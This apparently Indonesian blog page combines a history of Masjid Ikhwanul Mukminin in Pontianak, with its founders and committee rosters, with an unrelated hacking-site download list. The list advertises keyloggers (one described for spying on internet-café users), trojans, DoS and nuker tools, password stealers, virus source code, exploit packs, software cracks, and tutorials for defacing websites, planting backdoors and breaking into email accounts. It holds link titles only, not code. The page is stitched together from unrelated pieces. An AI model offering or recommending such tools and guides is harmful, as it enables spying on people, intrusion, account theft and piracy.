Sejarah Masjid Ikhwanul Mukminin
Oleh :
M. Thoyib HM
SEJARAH BERDIRINYA MASJID IKHWANUL MUKMININ
Masjid Ikhwanul Mukminin adalah salah satu masjid tua di kota Pontianak, Masjid megah yang terletak di tepian kota ini yang tepatnya berlokasi di Jl. Sungai Raya Dalam Pontianak Selatan Kalimantan Barat ini merupakann salah satu kebanggan warga masyarakat yang tinggal di daerah itu, karena masjid Ikhwanul Mukminin penuh dengan nilai histories dan nilai prinsip kebersamaan dan semangat gotong royong.
Menurut H. M. Nur Hasan, SE dalam bukunya Membangun Media Amal Saleh ( Selayang Pandang Masjid Ikhwanul Mukminin ) masjid ini adalah merupakan gambaran dari sebuah semangat Fastabiqul Khairat dan Nawaitu yang kuat dari seluruh jama’ah yang awalnya hanya sebuah Surau menjadi sebuah Masjid yang akhirnya diberi nama IKHWANUL MUKMININ.
Masjid ini didirikan pada tahun 1929-1930 dengan bermodalkan Rp 500, dan kayu-kayu yang berasal dari Tanjung Saleh ( milik H. Akil ) dari pembongkaran rumah yang telah dijualnya.
Maka masjid dengan ukuran 12×12M2 itu dapat memuaskan hati para Muslim dan Muslimah pada saat itu yang haus akan Rumah Ibadah dan cinta terhadap Rumah Ibadah. Karena konon menurut cerita para Orang tua sebelum Masjid ini berdiri seluruh masyarakat Muslim Sungai Raya melaksanakan Ibdaha Shalat Jum’at di Masjid Jami’ yang berada di dekat keraton Kadariyah Pontianak dengan menggunakan sampan dan berjalan kaki. Keberangkatannya tersebut diiringi dengan membawa barang hasil kebun seperti pisang, ubi-ubian dan lain-lain untuk ditukar dengan keperluan rumah tangga yang lain.
Oleh sebab itu, keberadaan Masjid Ikhwanul Mukminin ini sungguh berarti dan membantu bagi seluruh warga masyarakat Sungai Raya Dalam pada saat itu.
Dan masyarakat sangat berterima kasih tak terhingga kepada pelopor pembangunan masjid tersebut, sehingga masyarakat Islam masih dapat merasakan hasil dari pengorbanan mereka pada saat itu.
Menurut H. M. Nurhasan, SE yang berjasa dalam pembangunan tersebut adalah :
1. H. Ambo’ Dengeng Bin Makkuaseng, seorang Penggawa yang berasal dari tanah Bugis yang kemudian mewaqafkan tanahNya untuk dijadikan Masjid tersebut.
2. H. Lintang, Imam pertama Masjid Ikhwanul Mukminin yang sekaligus mertua dari H. Ali Lakana
3. H. Thayyeb, salah satu pegawai Masjid
4. H. Husin Bin Basok.
5. H. Bacok
6. H. Muhammad / Wak Leda’
7. H. Palemai
8. Ustadz Rasyid Matanna
9. H. Zakaria H. Husin
10. H. Rani dan Putranya H. Bidin
11. H. Ali Lakana
Menurut H. M. Nur Hasan, SE Masjid ini empat kali mengadakan pemugaran atau renovasi, dari tahun berdirinya 1929, kemudian rehab pertama pada tahun 1956 kemudian 1975 dan 1975. Selanjutnya pada tahun 1999 mengadakan renovasi total yang bertepatan pada tanggal 1 Muharam 1420 H / 16 April 1999 dengan peletakan batu pertama oleh salah satu pendiri Masjid Ikhwanul Mukminin yaitu Kakenda Tercinta H. Ali Lakana.
Dalam buku “Pedoman Pembinaan Masjid Paripurna” yang diterbitkan pada tahun 1996 oleh Badan Kesejahteraan Masjid ( BKM ). Propinsi Kalimantan Barat disebutkan bahwa Nabi Muhammad SAW telah memberikan contoh tentang fungsi masjid diantaranya :
1. Tempat pengajaran dan pendidikan Islam sebagai pewarisan agama dan kebuadayaan
2. Perpustakaan, sebagai himpunan khazanah ilmu pengetahuan
3. Tempat peradilan
4. Markas tentara dan tempat merawat prajurit yang luka ( Rumah Sakit )
5. Wadah Kesenian ( tempat sahabat membacakan sajak untuk Nabi )
6. Tempat bermalam Musafir
7. Tempat siding dua khalifah
8. Musyawarah segala sesuatu tentang masyarakat islam
9. Tempat pemilihan Khalifah
10. Tempat dan pernyataan masyarakat.
Untuk mendukung percepatan fungsi Masjid tersebut diatas maka didirikanlah Yayasan Ikhwanul Mukminin pada tahun 2001. dan telah berganti seiring dengan waktu sesuai dengan tuntutan zaman dan kondisi masyarakat.
Adapun struktur Pengurus Yayasan Ikhwanul Mukminin adalah :
SURAT KEPUTUSAN BADAN PENGURUS
YAYASAN IKHWANUL MUKMININ PONTIANAK
Nomor : 003/YIM/Kpts/10/1426 H
Tanggal 01 Dzulqaidah 1426 H / 03 Desember 2005 M
T e n t a n g
STRUKTUR ORGANISASI DAN PERSONALIA
BADAN PENGURUS YAYASAN IKHWANUL MUKMININ PONTIANAK
Periode 2005-2008
Penasehat / Sesepuh :
1. H. Abdurrachman H. Husin
2. H. M. Thahir H. Abidin
3. H. Sulaiman H. Latif
4. H. Syafei Thaha
Pembina :
1. Drs. H. Akmaluddin Hasibuan
2. Ir. H. Aryanto B. Hardigaloeh
3. Drs. H. M. Sood H.A. Kadir
4. H. Imran Galak
Ketua Umum : H.A. Effendi Lubis, SE
Ketua I : Drs. Syaiful Bahri
Ketua II : Wahyudin Masri, SE
Sekretaris Umum : H. Muhammad Nur Hasan, SE
Sekretaris I : H. Abdurrahman HM, S.Pd.I.
Sekretaris II : Rafilin H. Zailani, A.Md
Bendahara : Ishaq Idzzuldin, SE
A. Dakwah dan Ibadah :
1. M. Ilyas A. Latif (Koordinator)
2. H.M. Sanusi H.A. Karim, A.Ma
3. Sarifuddin, SHI
4. Husen Musa
5. Abdurrahman AR
6. H. Ali Laupek
7. Rahmad Sadeq
8. Musa H. Nawawi
9. Burhanuddin M. Thahir
10. Burhanuddin Bahrun
B. Pendidikan dan SDM :
1. Marlan M. Djafan (Koordinator)
2. Hudrin Zein
3. Karim, SH
4. Drs. Izhar Salim, M.Si
5. Shah Khumainy Salim
6. Herman Susilo, SE
7. Ny. Sulistiawati Gst.Yudhy Rasyidi
8. Ny. Hj. Salbiah H.M. Sanusi, A.Ma
9. Ny. Hamidah Burhanuddin
10. Ny. Zulaiha Zaini
C. Sosial dan Kesehatan :
1. H. Muhammad Nasir (Koordinator)
2. Drs. Sulaiman
3. H A. Wahab Musa
4. Ahmad H. Ismail
5. Agus Gunawan
6. Ya’cob H. Nawawi
7. Hamid Sauk
8. Haidi M. Thahir
9. Suhairi A. Razak
10. Malik A. Rasyid
D. Pemberdayaan Perempuan :
1. Ny. Hj. Farida Hanom Nasution
2. Ny. Hj. Habibon H.A. Ghani
3. Ny. Hj. Sanah H.M. Nasir
4. Ny. Sufiani Syaiful Bahri
5. Ny. Liliana Wahyudin Masri
6. Ny. Farida Nur Hasan
7. Ny. Retno Ishaq Idzzuldin
8. Ny. Mudiah H.M. Yusuf
9. Ny. Jamilah H. Sulaiman
10. Ny. Ratna Waiton
11. Ny. Zulaiha Ahmad H. Ismail
12. Ny. Hj. Syamsiah
13. Ny. Halimah
E. Pemuda, Remaja, Olahraga & Kesenian :
1. Gusti Syamsul Taviansyah,SE (Koordinator)
2. Khairil Anwar, SH
3. Sabli H. Bakri
4. Ismail Ahmad
5. Zakaria H.A. Karim
6. M. Thaha H.A. Rahman
7. Ismail H.A. Karim
8. Ahmad Dwi
9. Usman M. Thahir
10. Tarmizi
F. Perekonomian & Usaha Dana :
1. H. Burhan H. Abu Bakar (Koordinator)
2. Ir. Ahmad Sya’dudin Tufta’zany, MM
3. Riza Nirwan, SE
4. Agus Susila, SE
5. Juremy Ramlan
6. H. Sofwandi, SE
7. Iwan Darmawan
8. Asmunandar
9. Ibrahim Markus
10. Ismail Sanusi
G. Pembangunan, Peralatan & Perawatan :
1. Ir. Mizan Mukti (Koordinator)
2. A.Wahab H.A. Gani
3. Ir. Haryanto
4. Ir. Firmansyah, MM
5. Andrian, SE
6. Alfian, A.Md
7. Jafri H. Nuncik
8. Thalib M. Thahir
9. A.Rauf H. Zakaria
10. M. Saad
11. Marzuki
12. Eli Mawandi
13. Abdurrahman.
UNIT USAHA / KEGIATAN DI LINGKUNGAN
YAYASAN IKHWANUL MUKMININ
SUNGAI RAYA DALAM II PONTIANAK
NO
NAMA USAHA /
KEGIATAN
TAHUN BERDIRI
NAMA
PIMPINAN
PERIODE
01
BAITUL MAAL WATTAMWIL ( BMT)
KSU BMT IKHWANUL MUKMININ
27 SEPTEMBER
2000
M. NUR HASAN
M. NUR HASAN
2000-2005
2005-2010
02
REMAJA ISLAM MASJID IKHWANUL MUKMININ
( RIMIM )
28
SEPTEMBER
2000
KHAIRIL ANWAR
M. RISAI YOPPI
ISMAIL AHMAD
2000-2002
2002-2005
2005-2007
03
TAMAN KANAK-KANAK AL-QUR’AN (TKA – TPA)
MASJID IKHWANUL MUKMININ
01
OKTOBER
2000
M. SANUSI H.A. KARIM, A.Ma
2000-2004
04
PROGRAM BEA SISWA ANAK ASUHAN (bantuan awal 10 juta dari Pak Akmal)
30
AGUSTUS
2001
Ditangani Langsung oleh Badan Pengurus Yayasan
2001-2006
05
TIM HADRAH MASJID IKHWANUL MUKMININ
26
OKTOBER
2001
M. SANUSI H.A. KARIM, A.Ma
2001-2006
06
UNIT PENGUMPUL ZAKAT
( UPZ ) MASJID IKHWANUL MUKMININ
27
NOPEMBER
2001
H.M. THAHIR H. BIDIN
H.A.RAHMAN HM, S.Pd.I
2001-2006
2006-2011
07
PERPUSTAKAAN MASJID IKHWANUL MUKMININ
Pengurus Harian Yayasan
08
PROGRAM SERIKAT TOLONG MENOLONG
Pengurus Harian Yayasan
09
TIM FARDHU KIFAYAH
MASJID IKHWANUL MUKMININ
TAKMIR MASJID IKHWANUL MUKMININ
10
BAITUL MAAL IKHWANUL MUKMININ
2006
Hj. Anita Aslirosa
Yang tidak kalah menggembirakan adalah dibentuknya Remaja Islam Masjid Ikhwanul Mukminin ( RIMIM ) yang bertujuan untuk kaderisasi remaja-remaja Islam dalam pembentukan insan yang kuat dalam sisi jasadiayah dan bathiniyah.
Adapun struktur kpengurusannya adalah sebagai berikut :
Lampiran : SURAT KEPUTUSAN BADAN PENGURUS YAYASAN
IKHWANUL MUKMININ PONTIANAK
T e n t a n g
STRUKTUR ORGANISASI DAN PERSONALIA
PENGURUS REMAJA ISLAM MASJID IKHWANUL MUKMININ
Periode 2005-2007
Nomor : 027/YIM/SRD/05/1426 H
Dewan Pembina : 1. Ahmad H. Ismail
2. Burhanuddin M. Thahir
3. Khairil Anwar, SH
4. Sabli H. Bakri
5. M. Risa’i A. Wahab
Ketua : Ismail Ahmad
Wakil Ketua : M. Thoyib H.M. Thahir
Sekretaris : Wiwin Hadinata Ahmad
Bendahara I : Syamsurizal Yahya
Bendahara II : Fatmawati A. Rasyid
Seksi-Seksi :
1. Dakwah dan Pendidikan :
Koordinator : Rahmad Sadeq
Anggota : Haidi M. Thahir
: Zulaiha
: Siti Aisyah
2. Hubungan Masyarakat (Humas) dan Dokumentasi :
Koordinator : M. Syafrin Musa
Anggota : Nuri Novia Wulandari
: Siti Aminah
3. Olah Raga, Seni dan Budaya :
Koordinator : Syamsurizal
Anggota : Agus Ramadhani Ahmad
: M. Tasyim H. Syafei
: Nasruddin H.A. Wahab
4. Usaha Dana :
Koordinator : Baharudin
Anggota : Ibrahim Markus
: Asmunandar
5. Perlengkapan dan Pemeliharaan Lingkungan :
Koordinator : Ismail Sanusi
Anggota : Dodi Sugianto
: M. Sa’ad
: Burhanuddin Usman.
Dari awal dibentuknya RIMIM sudah memberikan nuansa baru bagi Masjid Ikhwanul Mukminin, baik dari segi peribadatan maupun dari segi kesenian. Remaja seperti yang kita tahu adalah generasi yang penuh dengan semangat dan ide-ide segar. Dengan dibentuknya remaja-remaja ini diharapkan menjadi cikal bakal kemajuan Islam di daerah Sungai Raya Dalam.
Masjid Ikhwanul Mukminin tidak pernah mati dengan Program-program kemasjidan, dak tak pernah bosan untuk mengajak pada kebaikan dan selalu memberikan wacana-wacana baru dalam pengembangan fungsi masjid tersebut. Saya akan memaparkan beberapa Program yang telah berjalan di Masjid Ikhwanul Mukminin sebagai bukti bahwa Masjid tidak hanya digunakan sebagai Tempat Shalat saja, tapi Masjid dapat digunakan untuk apapun selama itu bermanfaat bagi ummat islam itu sendiri.
SYARIKAT TOLONG MENOLONG ( STM )
Syarikat Tolong Menolong dicetuskan Oleh Bapak H. A. Effendi Lubis, SE. sebagai Ketua Umum beliau selalu memunculkan ide-ide baru yang efektif dalam pemberdayaan ekonomi ummat Islam di kawasan Sungai Raya Dalam. Tidak sebatas ide beliau aktif dan selalu mengawasi setiap aktifitas-aktifitas di Masjid sehingga proses ibadah vertical dan horizontal dapat terwujud dan berjalan secara beriringan.
Program ini adalah sejenis tabungan bulanan yang berisikan pos infaq, pos zakat, pos tabungan qurban dan pos jariyah.
Selama program ini berlangsung terasa betul manfaatnya bagi seluruh jama’ah dan warga sekitar yang memang perlu dibantu dan dalam kesulitan ekonomi. Masyarakat merasa bahwa Masjid memperhatikan mereka dan Masjid peduli tentang mereka.
Terbukti setelah program ini dijalankan jumlah qurban meningkat secara significant lewat tabungan qurbannya.
Masyarakat juga merasa terbantu, saat ada musibah kematian mereka mendapat bantuan dari Masjid untuk membeli peralatan Fardhu Kifayah.
Pendeknya, Masjid selalu ada untuk Masyarakat dan Masjid adalah milik Masyarakat.
Setelah Program ini berjalan, kembali Masjid Ikhwanul Mukminin menggelar Tabungan Infaq Baiti Jannati yang begitu membantu masyarakat kelas menengah kebawah dengan Program andalannya yaitu beasiswa dan Bimbel UAN gratisss.
Alhamdulillah, semua itu berkat bantuan dari Allah dan seluruh Jama’ah Masjid Ikhwanul Mukminin Sungai Raya Dalam Pontianak. Sehingga tujuan kita untuk menjadikan Masjid sebagai tautan hati insya Allah dapat terealisasi di Masjid yang kami cintai ini. Dan insya Allah Masjid Ikhwanul Mukminin akan selalu berbenah diri dan mengadakan perbaikan fisik dan fungsi serta pengembangan SDM secara berkala.
Dan kami mengharapkan do’a dari seluruh pembaca, agar kami tetap dapat Istiqomah dalam perjuangan suci ini mengharapkan ridha dari Ilahi Rabbi.
Masjid Ikhwanul Mukminin-
Posted by M. Thoyib HM at 6:22 AM 0 comments
Kumpulan Artikel Hack
Download - Gold Area
- Updated : 15 April 2007
Silver Area | Login Gold | Gold Area
Saat ini anda telah memanfaatkan fitur akses member anda untuk mengakses Download - Gold Area, selamat mendownload, ^^
Ditulis oleh :
Admin borneofree
Download - Gold - Ultra EditionArea
- Login Gold - Ultra Edition Area
Ultra Edition dikhususkan untuk para donator, yntuk login ke Gold Ultra Edition maka klik disini.
Walaupun begitu Gold tetap 100% GRATIS untuk didownload dan tidak perlu donasi.
Harap Maklum.
Download - Gold AreaGold Area memberikan content-content yang paling banyak dicari orang, bahkan mungkin anda tidak menemukan beberapa content ini di situs manapun, mungkin hanya disini saja, Super Download Gold, semua disediakan gratis untuk anda! Thanks for donator and thanks for all.
Download WINRAR 3.51
- Download WINRAR 3.51
- Download DeepFreeze 5.70.x
+ Download DeepFeeze 5.70.x
- Download DOS untuk disket booting :
+ Download program untuk membuat booting DOS 5.0
+ Download program untuk membuat booting DOS 6.0
+ Download program untuk membuat booting DOS 6.21
+ Download program untuk membuat booting DOS Windows 95
+ Download program untuk membuat booting DOS Windows 95B (OSR 2)
+ Download program untuk membuat booting DOS Windows 98 OEM
+ Download program untuk membuat booting DOS Windows 98SE (Second Edtion)
+ Download program untuk membuat booting DOS Windows ME
+ Download program untuk membuat booting DOS Windows ME (No ramdrive)
+ Download program untuk booting DOS Windows NT 3.51
+ Download program untuk booting DOS Windows NT 4.0 Workstation
+ Download program untuk booting DOS Windows NT 4.0 Server
+ Download program untuk booting DOS Windows 2000 Profesional
+ Download program untuk booting DOS Windows 2000 Server Edition
+ Download program untuk booting DOS Windows 2000 Advanced Server Edition
+ Download program untuk booting DOS Windows XP Home Edition
+ Download program untuk booting DOS Windows XP Professional Edition
- Download Source code games dan multimedia untuk VB :
+ Download Source code games dan multimedia untuk VB - Disk 1
+ Download Source code games dan multimedia untuk VB - Disk 2
+ Download Source code games dan multimedia untuk VB - Disk 3
Download source code security untuk VB :
+ Download Source code security untuk VB - Disk 1
+ Download Source code security untuk VB - Disk 2
- Download program SoftICE (NT)
+ Download SoftICE - Disk 1
+ Download SoftICE - Disk 2
+ Download SoftICE - Disk 3
+ Download SoftICE - Disk 4
+ Download tutorial SoftICE (English) + Contoh bhs Indo
+ Tutorial dalam bahasa Indonesia
- Lainnya
+ Download 40HV mag Issue
+ Download HWA.hax0r.news
Rekomendasi free hosting :
+ http://www.awardspace.com
Content baru yang telah diupload
CrackersKit (Pengen jadi crackers program ? kamu harus punya ini tools, karena fiturnya lengkap kap buat bantu kamu)
- CrackersKit (Paket software crack terlengkap) Disk 1
- CrackersKit (Paket software crack terlengkap) Disk 2
- CrackersKit (Paket software crack terlengkap) Disk 3
- CrackersKit (Paket software crack terlengkap) Disk 4
- CrackersKit (Paket software crack terlengkap) Disk 5
- CrackersKit (Paket software crack terlengkap) Disk 6
Beat The Clock + Tutor (Warnet Hacking)
- Download Beat The Clock - Disk 1
- Download Beat The Clock - Disk 2
- Download Beat The Clock - Disk 3
- Download Beat The Clock - Disk 4
Serial 2000 v7.1 (Full Serial + Crack) - tahun 2004 releasenya, byk sekali crack yang fungsional ;)
- Download Serial 2000 v7.1 - Disk 1
- Download Serial 2000 v7.1 - Disk 2
- Download Serial 2000 v7.1 - Disk 3
- Download Serial 2000 v7.1 - Disk 4
Golden Eye (Keylogger sekelas ChildSafe), berani coba ?
- Download Golden Eye (Keylogger sekelas ChildSafe)
RegFreeze v3.0 (membekukan registry agar aman dari spyware, hijacker, dll)
- Download RegFreeze v3.0 - Disk 1
- Download RegFreeze v3.0 - Disk 2
Download Invisible Browsing
- Download Invisible Browsing
Registry Workshop 1.7.0
- Download Registry Workshop 1.7.0
Hide IP
- Download Hide IP 1.6.3
Password Recovery Kit Enterprise 7.0 (Documents Crack Password) , Versi enterprise ini udah ada cracknya yang bikin crack document tambah mantab!,
- Download Password Recovery Kit Enterprise 7.0 - Disk 1
- Download Password Recovery Kit Enterprise 7.0 - Disk 2
- Download Password Recovery Kit Enterprise 7.0 - Disk 3
Software Time Lock v2.2 (Cocok untuk membatasi akses waktu menggunakan komputer)
- Download Software Time Lock v2.2
Unlocker 1.5
- Download Unlocker 1.5
Damn Info Viewer
- Download Damn Info Viewer
Childsafe (Url baru!), keylogger ini paling banyak digunakan oleh orang untuk keylog warnet, awas jangan di keylog diwarnet, klo mau download!
- Download Childsafe
Nullsoft mIRC Control Plug-in
- Download Nullsoft mIRC Control Plug-in
Special content for Gold
Special content ini merupakan content yang mayoritas untuk hacking, dimana contentnya bisa dibilang udah rada lama tapi lumayan ampuh jika untuk hack-hack PC yang masih pakek Windows lama (Windows 95/98/NT/2000).
Yang membuat semakin special, adalah walau isinya “kumpulan” tapi isinya tidak lebih dari 2 mb, jadi anda tidak perlu download lama-lama untuk mendownload kumpulan tools dibawah ini, Enjoy it!
Download 007 Password Recovery (DialUpHack)
- Download 007 Password Recovery
Download Magic Login ++ (Crack All of Version Yahoo Messenger, MultiLogin, and Antilink Crasher)
- Download Download Magic Login ++
Download kumpulan hasil deface terkenal (seperti adulttv.com, angelfire.com, japan.co.jp, milw0rm, nasa-hacked, dsb)
- Download kumpulan hasil deface terkenal
Download Perfect Keylogger (Keylogger yang bisa digabung dengan file executable lain)
- Download Perfect Keylogger
Download kumpulan ip addreas tools (Dippler32, Here, IP Sniff, IP Watcher, IP2, MyWanIP, Net IP Poster, Tambu IP Addreas LookUp, WinIP, WinIPDO)
- Download kumpulan ip addreas tools
Download kumpulan keylogger (9xInt09, Canary, Key Logger, Keyboard Spy, KeyLog 25, Keylog 98, KeyLogger, KeyProbe, KeyTrap, Klogger, PC Activity Monitor Pro, Stealth Monitor)
- Download kumpulan keylogger
Download kumpulan NT Hacking Tools (commspymonitor, cpuhog, crash, dally, die3nt, epdump, getadmin, ntcrack, ntcrash, ntfsdos, pingersrc, rbutton, sechole, uns12exe)
- Download kumpulan NT Hacking Tools
Download CISCO Scanner
- Download CISCO Scanner
Download Kumpulan Trojans (Back Orifice 2000, fc Webdownloader, Mini Asylum, Undetected, WebAsylum)
- Download Kumpulan Trojans
Download Kumpulan Nukers Tools (fedup, gimp, killme, killwin, knewkem, liquidnuke, mnuke, muerte, nuke, nukeattack, nuker102, pnewq, project1, pstlince, simportnuke, sprite32, vconnect, vzmnuker, wingenocide, winnukeit, winnuker02, winnukev95, wnuke3269, wnuke4, wnuke95)
- Download Kumpulan Nukers Tools
Download Kumpulan Port Scanner 1 (7th Sphere Portscan, Angry IP Scanner, Attacker, Box Scanner, DomainScan, IP Sweeper, IP Tools 2000, LANguard Port Scanner, Netmon, Port Scavenger, Site Scan by Rhino9, Sub-buster, SuperScan)
- Download umpulan Port Scanner 1
Download Kumpulan Port Scanner 2 (NScan, NukeNabber, Port Block, Tambu UDP Scrambler, Wingate Scan, XPort Scan)
- Download Kumpulan Port Scanner 2
Download Kumpulan Password Crack Tools 1 (Password Fetch, Password stealer, Password Thief, PWDump 2, PWDump, RatCracker, RePwl, SAMDUMP, ScreenSaver Cracker, Simpleripper, Snadboys Revelation, WINPWL 3 Attack, XiT, Yet Another ARJ Cracker)
- Download Kumpulan Password Crack Tools 1
Download Kumpulan Password Crack Tools 2 (AMI Crack, Break Zip, cRARk, DragonBallZ, Fast Zip Cracker, Gammaprog, ipccrack, IRC password cracker, iSpy, L0phtCrack v2_52 Reg Key generator, MS LANMAN extract, PassWD)
- Download Kumpulan Password Crack Tools 2
Download kumpulan phreaking tools (30boxes, a_dial, airphone, bluebeep, bluebox, canbox, cellman2, cna, cordless, cphreak, cpp, demon, dtmf_d, fibroton, keyhole, littleop31, mjamr, modemh, motorola, nocarrier, omega110, omnibox, p80box20, pager, payphone, phmas10, T|110, tmaster, ultrad3, winphrea, xdialer, zhack321)
- Download kumpulan phreaking tools
Download John the Ripper DOS
- Download John the Ripper DOS
Download John the Ripper Windows
- Download John the Ripper Windows
Bonus : (Kumpulan C Scripts tua, cjm-warz, codebreakers, crh)
- Bonus Lainnya
X-Code Content Download
- Download Mirror Web 2007
- Download X-Code Video
- Download X-Code Energy Saturn
- Paket Wallpaper - Disk 1
- Paket Wallpaper - Disk 2
- Download guestbook web
- Download guestbook Mirror
- Download Artikel X-Code di komunitas lain
- Download beberapa artikel lama ^family_code^
- Perintah DALNET
- Daftar ip warnet Yogya (Periksa di bagian forum -> forum membahas warnet / ISP)
- Artikel-artikel ^fanily_code^ di web lain
- Video X-Code
Video Computer & Hacking
X-Code Video
- Download tes_program.zip
- Download awas_movie_palsu.zip
- Download cek_bug_dgn_nikto.zip
- Download nembak_apache.zip
- Download install_phpbb.zip
- Download fingerprinting.zip
- Download cpp_builder.zip
JambiHackerlink Video
- Download Video HackAdvancedGuestbook
- Download Video HackBukuTamu
- Download Video HackCatalog
- Download Video HackCpath
- Download Video HackForumPhpBB2
- Download Video HackHpMaker
- Download Video HackMambo
- Download Video HackPhpCoin
- Download Video HackPhpGedView
- Download Video HackPHPinjection
- Download Video HackPHPNuke2
- Download Video MassDeface
PusHm0v Video
- Download CulikPDShopPro
Video Hack Yahoo
- Download Yahoo Hacking (Hack e-mail Yahoo) - Disk 1
- Download Yahoo Hacking (Hack e-mail Yahoo) - Disk 2
- Download Yahoo Hacking (Hack e-mail Yahoo) - Disk 3
Download video lainnya
- Download vBulletin Hack
- Download LimeWireHack
Download kumpulan tutor dan artikel terlengkap dan terbaru
- Download kumpulan tutor dan artikel - 1
(Jelaga, Kahmi, Kecoak, KompiSingCat, Ezine Echo lama, SecretColony, YogyaCarding, lain-lainnyaya)
- Download kumpulan tutor dan artikel - 2
(Ezine Echo lama, Tutor lengkap Jasakom lama)
- Download kumpulan tutor dan artikel - 3
(Artikel, Astronomi, BaliHack, Cyber Samarinda, ICT, IndoProg, IndoSecure, LinuxBali, LinuxJakarta, LinuxLainnya, Newbies, PakTani dan lainnya)
- Download kumpulan tutor dan artikel - 4
(Tutor tembak ip, Jasakom tutor baru, Unicode tutor)
Bonus tutor :
- Tutor cara melakukan deface pada web
(Deface situs PHPNuke, Deface situs asp/IIS dgn tools Exploit, deface situs asp/IIS dgn SQL Injection, deface situs asp/IIS dgn menggunakan Windows 98, deface situs php dgn SQL Injection, deface situs php dgn SQL Injection II, deface guestbook (buku tamu), deface guestbook (buku tamu) 2 , deface Forum PhpBB2, deface Forum PhpBB2 II, deface guestbook pakai pic, deface situs php nuke, deface melalui showpage.cgi, Hacking Forum Phphbb v.phpBB-2.0.5, PHP-NUKE-BUGS).
- Tutor lengkap cara bermain di shell target
(pasang backdoor, pasang bindtty, belajar NgeRoot, Cracking Root, langkah-langkah bikin PSYBNC I dan II danlangkah-langkah bikit BOT I dan II).
- Cara masuk komputer orang lain dengan W32/Romdil (disertakan toolsnya)
- Menjebol Password Network Neigborhoud
- Mengenai Ngembom E-Mai Lewat E-Mail
- Kumpulan Tutorial HOW TO CRACK, by +ORC (English)
Download THE ART OF INTRUSION
- Download E-book The Art of Intrusion (disk 1)
- Download E-book The Art of Intrusion (disk 2)
Downnload Bahasa Pemograman
Download berbagai macam bahasa pemograman
- Download LCC untuk exploit di Windows
- Download ActivePerl untuk exploit di Windows
- Download Python untuk exploit di Windows
- Download bahasa pemograman QBASIC
- Download bahasa pemograman Turbo Pascal 7.0
- Download bahasa pemograman Turbo Basic
- Download bahasa pemograman Turbo Assembler
- Download bat2com
Download Turbo C :
- Download bahasa pemograman Turbo C Disk 1
- Download bahasa pemograman Turbo C Disk 2
- Download bahasa pemograman Turbo C Disk 3
- Download bahasa pemograman Turbo C Disk 4
- Download bahasa pemograman Turbo C Disk 5
- Download bahasa pemograman Turbo C Disk 6
Download Visual Basic for DOS
- Download Visual Basic for DOS (Disk 1)
- Download Visual Basic for DOS (Disk 2)
- Download Visual Basic for DOS (Disk 3)
- Download Visual Basic for DOS (Disk 4)
- Download Visual Basic for DOS (Disk 5)
Download Source Code Virus (Assembler)
- Download Paket Source code membuat virus komputer (Segala ekstensi) [DISK 1]
- Download Paket Source code membuat virus komputer (Ekstensi *.ASM) [DISK 2]
- Download Paket Source code membuat virus komputer (*.SCR & *.DOC) [DISK 3]
- Download Paket Source code membuat virus komputer (Ekstensi *.TXT) [DISK 4]
Download cara kerja virus dan implementasinya (Tutor + Source VB) :
- Download Tutor + Source Virus
Download Hacking Material
Hacking warnet untuk penetration test
- Download Tools untuk hack Billing Explorer
- Download Tool untuk hack DeepFreeze
- Download Hack untuk membuka semua fitur Windows warnet yang terkunci
Download kumpulan Exploit dan tools
- Download kumpulan Exploit untuk Web Vuln 2006
- Download kumpulan Exploit untuk Windows Vuln 2006
- Download kumpulan Exploit untuk Injection dan lainnya
- Download kumpulan tool, exploit dan lainnya untuk memeriksa vuln web
- Download IRC script for attack old mIRC version
- Download program untuk Denial Of Service
- Download phpBB Defacer Tool
- Download Kaht
- Download IgmpNuke
- Download Netbus
- Download Netcat
- Download Putty
- Download Brutus
- Download Trojan R3C
- Download SMBdie
- Download Anti Booter
- Download LanDiscovery v1.0
- Download Internet Maniac dan PQwak
- Download 007 Password Recovery
- Downloa Child Safe
- Download Void Eye
- Download Proactive Windows Security Explorer
- Download HennestScript IRC v0.61
- Download Radmin
- Download Internet Download Manager
- Download program RePWL v3.01
- Download program 7th Sphere Edition
- Download program Angry Ip Scanner
- Download program LissovSky Scan
- Download http tunnel untuk Windows
- Download http tunnel untuk linux
- More Download ..
Download Passware lama :
- Download Passware Password Recovery 5.3 (1)
- Download Passware Password Recovery 5.3 (2)
- Download Passware Password Recovery 5.3 (3)
- Download Passware Password Recovery 5.3 (4)
Download program password Reminder v1.1
- Download program Password Reminder v1.1 (1)
- Download program Password Reminder v1.1 (2)
- Download program Password Reminder v1.1 (3)
Source Code untuk Web
- Download CuteNews.1.4.1 untuk CMS para jurnalis
- Download AuraCMS v1.62
- Download buku tamu dengan dukungan photo (PHP)
- Download Pembuatan input output artikel dengan PHP
- Download Polling website dengan PHP
- Download kumpulan source code PHP
- Download buku tamu standard dengan PHP
- Download program counter dengan PHP
- Download program tampilan menu yang friendy dengan PHP
- Download kumpulan source code pasword protection dengan javascript
Download Content baru / terbaru
- Download WarnetCleaner 2006 v0.7
- Download Aplikasi SMS dan source codenya
- Download kumpulan AntiVirus Lokal
- Download kumpulan tool untuk OverClock VGA Card
- Download kumpulan Source Code VB pilihan dari VBBEGO
- Download WordPress Source
- Download kumpulan perintah DALnet
- Download kumpulan tutor dari Klikkanan
- Download kumpulan seri nokia lama
- Download kumpulan daftar area nomor HP
- Download Nikto untuk memeriksa Web Vuln
- Download Virtual Keyboard
- Download Rar Pass Crack
- Download Tutor dari SamarindaHack
- Tutorial lengkap untuk cracking
Download programs bawaan web Yogyafree Classic
- Download Microsoft Windows 1.0.1 buatan 1985
- Download preview slide Microsoft Windows 1.01 buatan 1985
- Download BadCopyPro v3.65
- Download Alkonost MaxFormat
- Download Active@ Undelete
- Download PC Boost
- Download PC Medic
- Download program PDF Converter v3.1
- Download PC Accelerator
- Download Antivir Personal Edtion
- Download CPU-Z
- Download HD-COPY 2.0A
- Download HDD Regenerator
- Download program WinRescue
- Download program System Mechanic
- Download program Window Washer v4.7
- Download Folder Guard v5.4a Profesional Edtition
- Download PC Security v1.41
- Download program Hot CPU Tester Pro 4
- Download TMPGEnc
- Download AUDIOGRABBER v.1.80
- Download program HTMLZIP
- Download Rainlendar
- Download MP3 to WAV Converter
- Download Advanced Archive Password Recovery 2.10
- Download program Nokia Multimedia Player
- Download program Xilisoft 3GP Video Converter
Special Download Tools :
- Download Handy Recovery
- Download Advanced E-mail Extractor
Download program dBpower AMP Music Converter
- Download dBpower AMP Music Converter (1)
- Download dBpower AMP Music Converter (2)
- Download dBpower AMP Music Converter (3)
- Download dBpower AMP Music Converter (4)
Download Lainnya
